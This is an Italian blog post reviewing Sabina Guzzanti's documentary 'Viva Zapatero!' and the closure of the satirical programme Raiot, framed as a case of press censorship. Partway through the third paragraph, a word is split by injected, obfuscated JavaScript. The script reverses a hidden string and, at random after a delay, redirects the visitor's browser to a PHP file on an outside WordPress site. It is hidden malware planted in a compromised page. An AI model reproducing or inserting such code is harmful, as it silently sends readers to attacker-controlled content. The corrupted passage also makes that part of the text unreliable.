Satira e libertà

image_pdfimage_print

Viva Zapatero! è un atto di accusa contro la censura nel nostro Paese. Il bel film di Sabina Guzzanti è una raccolta di interviste, documenti e spezzoni di spettacoli teatrali e televisivi, messa insieme all’indomani della prima (e ultima) puntata di Raiot. Raiot era un programma satirico voluto da Raitre ma subito chiuso “per cautela” dalla Rai dopo la querela di Mediaset, poi rigettata dal tribunale.
In Viva Zapatero! rivediamo i volti noti ed oscurati di Biagi, Santoro, Luttazzi, sentiamo cos’è la satira secondo Fo e secondo Gasparri, ingoiamo le amare lezioni dei giornalisti stranieri sulla libertà di stampa, assistiamo sgomenti alla processione di servi muti e servi sbruffoni, restiamo senza parole di fronte a una sinistra che non trova nulla da dire rispetto alla censura.
C’è poco da ridere, anzi, viene da piangere, insieme all’anziano giornalista del Corriere che non trattiene le lacrime per le dimissioni forzate del suo direttore, per la cacciata di Biagi. Dov’era l’opposizione, perché i giornalisti non hanno fatto sciopero? E questa è solo la prima dom (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anda…

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *